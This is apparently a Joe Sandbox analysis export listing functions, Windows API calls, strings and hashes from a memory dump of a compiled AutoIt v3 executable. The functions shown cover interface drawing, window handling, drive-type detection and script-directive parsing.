TABLEFT, xrefs: 01013687
EDITPASTE, xrefs: 0101395F
FINDSTRING, xrefs: 01013776
HIDEDROPDOWN, xrefs: 01013700
ADDSTRING, xrefs: 01013716
GETCURRENTCOL, xrefs: 01013928
GETSELECTED, xrefs: 010138A3
ISENABLED, xrefs: 0101366B
SELECTSTRING, xrefs: 01013806
GETLINECOUNT, xrefs: 010138C6
ISVISIBLE, xrefs: 01013637
SHOWDROPDOWN, xrefs: 010136E0

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 9dcf076c99b851697aadfd75a96401dd2733db31a9bed6cec5a8c528010ee984
Instruction ID: 0c126c61f394969ddf33040d4000a091dc0026c5ff7252707033ed3915ec793d
Opcode Fuzzy Hash: 9dcf076c99b851697aadfd75a96401dd2733db31a9bed6cec5a8c528010ee984
Instruction Fuzzy Hash: 5AD190702083019BDA04FF14C852A6E7BE5BF983A4F54486CF8C65F2A6DB2DD90ADB41

Function 0101A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0101A630
GetSysColorBrush.USER32(0000000F), ref: 0101A661
GetSysColor.USER32(0000000F), ref: 0101A66D
SetBkColor.GDI32(?,000000FF), ref: 0101A687
SelectObject.GDI32(?,00000000), ref: 0101A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0101A6C1
GetSysColor.USER32(00000010), ref: 0101A6C9
CreateSolidBrush.GDI32(00000000), ref: 0101A6D0
FrameRect.USER32(?,?,00000000), ref: 0101A6DF
DeleteObject.GDI32(00000000), ref: 0101A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0101A731
FillRect.USER32(?,?,00000000), ref: 0101A763
GetWindowLongW.USER32(?,000000F0), ref: 0101A78E

Part of subcall function 0101A8CA: GetSysColor.USER32(00000012), ref: 0101A903
Part of subcall function 0101A8CA: SetTextColor.GDI32(?,?), ref: 0101A907
Part of subcall function 0101A8CA: GetSysColorBrush.USER32(0000000F), ref: 0101A91D
Part of subcall function 0101A8CA: GetSysColor.USER32(0000000F), ref: 0101A928
Part of subcall function 0101A8CA: GetSysColor.USER32(00000011), ref: 0101A945
Part of subcall function 0101A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101A953
Part of subcall function 0101A8CA: SelectObject.GDI32(?,00000000), ref: 0101A964
Part of subcall function 0101A8CA: SetBkColor.GDI32(?,00000000), ref: 0101A96D
Part of subcall function 0101A8CA: SelectObject.GDI32(?,?), ref: 0101A97A
Part of subcall function 0101A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0101A999
Part of subcall function 0101A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101A9B0
Part of subcall function 0101A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0101A9C5
Part of subcall function 0101A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0101A9ED

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 9ae2af321a1cc95d2f9e2e6efab4bbfb2897497a4c05917d9af78084222c5808
Instruction ID: cdc5d679ed548cbdcf212027fdafcf728c526614a504c9eee9fff396aabfac3b
Opcode Fuzzy Hash: 9ae2af321a1cc95d2f9e2e6efab4bbfb2897497a4c05917d9af78084222c5808
Instruction Fuzzy Hash: EE918C72109302EFD7219F64DC08A5B7BE9FF89321F100B19FAA696194D73ED948CB51

Function 00F92C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00F92CA2
DeleteObject.GDI32(00000000), ref: 00F92CE8
DeleteObject.GDI32(00000000), ref: 00F92CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00F92CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00F92D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00FCC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FCC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FCC89D

Part of subcall function 00F91B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F92036,?,00000000,?,?,?,?,00F916CB,00000000,?), ref: 00F91B9A

SendMessageW.USER32(?,00001053), ref: 00FCC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FCC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FCC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FCC912

Strings

0, xrefs: 00FCC731

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 70143a2ca209f9a7752c94ccc8cf9f150aac3cb851d640116e8933e02df6dd85
Instruction ID: f0d915990dd624f66472ea70cd9a97a98adc2d1e01e808ffacd674f6e4cede2a
Opcode Fuzzy Hash: 70143a2ca209f9a7752c94ccc8cf9f150aac3cb851d640116e8933e02df6dd85
Instruction Fuzzy Hash: FE129C30A00202EFDB65CF24CA85FA9BBA5FF04320F58456DE599DB252C735E846EB91

Function 010074AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 010074DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0100759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010075DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 010075ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01007633
GetClientRect.USER32(00000000,?), ref: 0100763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01007683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01007692
GetStockObject.GDI32(00000011), ref: 010076A2
SelectObject.GDI32(00000000,00000000), ref: 010076A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010076B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 010076BF
DeleteDC.GDI32(00000000), ref: 010076C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010076F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0100770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01007746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0100775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0100776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0100779B
GetStockObject.GDI32(00000011), ref: 010077A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010077B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 010077BB

Strings

DISPLAY, xrefs: 01007688
msctls_progress32, xrefs: 0100773C
static, xrefs: 0100767D, 01007795
AutoIt v3, xrefs: 0100762B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: c63c2c390f149a5b9d5cb09db77e92f9d5b0b497bd8c4833b1dc3c55fdcdcaf9
Instruction ID: 9bb52c7b30192ab9951c55b4a4d1dbd051e5dfa22d4051a880c2259a2bbf3dff
Opcode Fuzzy Hash: c63c2c390f149a5b9d5cb09db77e92f9d5b0b497bd8c4833b1dc3c55fdcdcaf9
Instruction Fuzzy Hash: 57A16071A40205BFEB24DBA8DC4AFAF7BB9EB05750F004118FA55A72D0D7B9AD04CB64

Function 00FFAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFAD1E
GetDriveTypeW.KERNEL32(?,0101FAC0,?,\\.\,0101F910), ref: 00FFADFB
SetErrorMode.KERNEL32(00000000,0101FAC0,?,\\.\,0101F910), ref: 00FFAF59

Strings

SSD, xrefs: 00FFAE86
SSA, xrefs: 00FFAEE2
CDROM, xrefs: 00FFAE2F
Fixed, xrefs: 00FFAE43
FileBackedVirtual, xrefs: 00FFAF28
PhysicalDrive, xrefs: 00FFADA7
Fibre, xrefs: 00FFAEE9
ATAPI, xrefs: 00FFAECD
SCSI, xrefs: 00FFAEC6
USB, xrefs: 00FFAEF0
ATA, xrefs: 00FFAED4
MMC, xrefs: 00FFAF1A
Unknown, xrefs: 00FFAE1B, 00FFAEBF
SATA, xrefs: 00FFAF0C
RAID, xrefs: 00FFAEF7
SAS, xrefs: 00FFAF05
Network, xrefs: 00FFAE39
Removable, xrefs: 00FFAE4D
Virtual, xrefs: 00FFAF21
RAMDisk, xrefs: 00FFAE25
\\.\, xrefs: 00FFAD70
1394, xrefs: 00FFAEDB
iSCSI, xrefs: 00FFAEFE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 0ede5394a8c093f95e116ca08d02bf72105fee0c174ac99c7a408c23f9633c19
Instruction ID: 796d674ed6302ce3cc6c01dad293492c00f61e1d0806ab65be84d60955599017
Opcode Fuzzy Hash: 0ede5394a8c093f95e116ca08d02bf72105fee0c174ac99c7a408c23f9633c19
Instruction Fuzzy Hash: 2F51D7F1A4820D9B9B00EB51CDC2DBD73A0EF08710720846AE64BAF2B5D6B59D01FB53

Function 00F968DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F96931
__wcsnicmp.LIBCMT ref: 00F96949
__wcsnicmp.LIBCMT ref: 00F96961
__wcsnicmp.LIBCMT ref: 00F96979
__wcsnicmp.LIBCMT ref: 00F96991
__wcsnicmp.LIBCMT ref: 00F969A9
__wcsnicmp.LIBCMT ref: 00F969C1
__wcsnicmp.LIBCMT ref: 00F969D5
__wcsnicmp.LIBCMT ref: 00F96A16
__wcsnicmp.LIBCMT ref: 00F96A2A
__wcsnicmp.LIBCMT ref: 00F96A3E
__wcsnicmp.LIBCMT ref: 00F96A52

Strings

#requireadmin, xrefs: 00F9695B
Unterminated group of comments, xrefs: 00FCE403
#comments-end, xrefs: 00F96A38
#include, xrefs: 00F969A3
#cs, xrefs: 00F969CF, 00F96A24
#OnAutoItStartRegister, xrefs: 00F96973
#notrayicon, xrefs: 00F96943
Cannot parse #include, xrefs: 00FCE3F0
#ce, xrefs: 00F96A4C
#pragma compile, xrefs: 00F9692B
Bad directive syntax error, xrefs: 00FCE31A
#comments-start, xrefs: 00F969BB, 00F96A10
#include-once, xrefs: 00F9698B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 8420d451d965ce3331da8d36c7daccdadf14629279e38c9d3cfd32eaa3ec14ca
Instruction ID: 13331e8f5197817b54a59951bc0d5555ef92b54ed12c7c8060aec1ccd588d22d
Opcode Fuzzy Hash: 8420d451d965ce3331da8d36c7daccdadf14629279e38c9d3cfd32eaa3ec14ca
Instruction Fuzzy Hash: 178128B1A402066AEF21AB61DD83FBF3768AF05710F044029F845AB196EF78DE45FA51

Function 01019A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01019AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01019B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 01019BA7

Strings

0, xrefs: 01019BE4

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 02f8d103dad7b29964f91cc6a248dbf8437859a9801f2ddea1ba3d3b152a298b
Instruction ID: 02eed2c62772a8fa947227d895d97c25e83a841148a8289dff59aa2578d4b6ef
Opcode Fuzzy Hash: 02f8d103dad7b29964f91cc6a248dbf8437859a9801f2ddea1ba3d3b152a298b
Instruction Fuzzy Hash: DE02CE30104301AFEB658F28C868BAABFE5FF49318F04495CFAD5962A9C77DD944CB52

Function 0101A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0101A903
SetTextColor.GDI32(?,?), ref: 0101A907
GetSysColorBrush.USER32(0000000F), ref: 0101A91D
GetSysColor.USER32(0000000F), ref: 0101A928
CreateSolidBrush.GDI32(?), ref: 0101A92D
GetSysColor.USER32(00000011), ref: 0101A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101A953
SelectObject.GDI32(?,00000000), ref: 0101A964
SetBkColor.GDI32(?,00000000), ref: 0101A96D
SelectObject.GDI32(?,?), ref: 0101A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0101A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0101A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0101A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0101AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0101AA32
DrawFocusRect.USER32(?,?), ref: 0101AA3D
GetSysColor.USER32(00000011), ref: 0101AA4B
SetTextColor.GDI32(?,00000000), ref: 0101AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0101AA67
SelectObject.GDI32(?,0101A5FA), ref: 0101AA7E
DeleteObject.GDI32(?), ref: 0101AA89
SelectObject.GDI32(?,?), ref: 0101AA8F
DeleteObject.GDI32(?), ref: 0101AA94
SetTextColor.GDI32(?,?), ref: 0101AA9A
SetBkColor.GDI32(?,?), ref: 0101AAA4

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 50c3db8566d55ad3af359ce44346357e7cc1be2643147ab791809159de019cb2
Instruction ID: f01eab5c368de87271fa0fcd9cbf6a18038ea50c12d5e79d3015b707cd4d90bb
Opcode Fuzzy Hash: 50c3db8566d55ad3af359ce44346357e7cc1be2643147ab791809159de019cb2
Instruction Fuzzy Hash: 67518C71901209FFDB219FA8DC48EAE7BB9FF08320F114215FA55AB295D77A9940CF90

Function 010189D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01018AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01018AD2
CharNextW.USER32(0000014E), ref: 01018B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01018B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01018B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01018B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01018B86
SetWindowTextW.USER32(?,0000014E), ref: 01018BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01018BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 01018C1F
_memset.LIBCMT ref: 01018C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01018C8D
_memset.LIBCMT ref: 01018CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 01018D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 01018D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 01018E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 01018E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01018E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01018EB4
DrawMenuBar.USER32(?), ref: 01018EC3
SetWindowTextW.USER32(?,0000014E), ref: 01018EEB

Strings

0, xrefs: 01018E55

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 337a8d35a4fdc207c053f3ecabce94e13878bf0182f9362344e424cf3f490920
Instruction ID: a17d441bae4a8479892395a6df09385f46b97ca2ca52d0c9263065eaa3278e79
Opcode Fuzzy Hash: 337a8d35a4fdc207c053f3ecabce94e13878bf0182f9362344e424cf3f490920
Instruction Fuzzy Hash: C4E18571900209AFDF60DF65CC84EEE7BB9FF09710F00819AFA95AA195D7798684CF50

Function 0101488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 010149CA
GetDesktopWindow.USER32 ref: 010149DF
GetWindowRect.USER32(00000000), ref: 010149E6
GetWindowLongW.USER32(?,000000F0), ref: 01014A48
DestroyWindow.USER32(?), ref: 01014A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01014A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01014ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01014AE1
SendMessageW.USER32(?,00000421,?,?), ref: 01014AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01014B09
IsWindowVisible.USER32(?), ref: 01014B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01014B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01014B58
GetWindowRect.USER32(?,?), ref: 01014B70
MonitorFromPoint.USER32(?,?,00000002), ref: 01014B96
GetMonitorInfoW.USER32(00000000,?), ref: 01014BB0
CopyRect.USER32(?,?), ref: 01014BC7
SendMessageW.USER32(?,00000412,00000000), ref: 01014C32

Strings

0, xrefs: 01014975
tooltips_class32, xrefs: 01014A96
(, xrefs: 01014BA3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 866082fb5119af64a3f8aa38335c1e9ca70e92ea8da20f19bbce22d8a5225d4f
Instruction ID: f2fec4cf5145c9c611ba290f2a13bdc9afa6ed124335136a0fdbde704f6e59f7
Opcode Fuzzy Hash: 866082fb5119af64a3f8aa38335c1e9ca70e92ea8da20f19bbce22d8a5225d4f
Instruction Fuzzy Hash: 98B1AB71608341AFDB44DF68C885B6ABBE4BF88314F00891CF9D99B2A1D779E805CB95

Function 00FF449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FF44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FF44D2
_wcscpy.LIBCMT ref: 00FF4500
_wcscmp.LIBCMT ref: 00FF450B
_wcscat.LIBCMT ref: 00FF4521
_wcsstr.LIBCMT ref: 00FF452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FF4548
_wcscat.LIBCMT ref: 00FF4591
_wcscat.LIBCMT ref: 00FF4598
_wcsncpy.LIBCMT ref: 00FF45C3

Strings

%u.%u.%u.%u, xrefs: 00FF4626
04090000, xrefs: 00FF457E
StringFileInfo\, xrefs: 00FF451B
DefaultLangCodepage, xrefs: 00FF45AB
\VarFileInfo\Translation, xrefs: 00FF4540

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: bddb41ff84182a31bec892e4f3f33ca8ae11e3731c2e5eb21f5b635245a7a66d
Instruction ID: cb63ff652bc76634805c878af90633e9b16607f0ff01f22580ecb10bd133f983
Opcode Fuzzy Hash: bddb41ff84182a31bec892e4f3f33ca8ae11e3731c2e5eb21f5b635245a7a66d
Instruction Fuzzy Hash: D84138729402057BDB10BA72CC47EFF776CDF46710F04055AFA04EA192EA3CAA01AAB5

Function 00F927D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F928BC
GetSystemMetrics.USER32(00000007), ref: 00F928C4
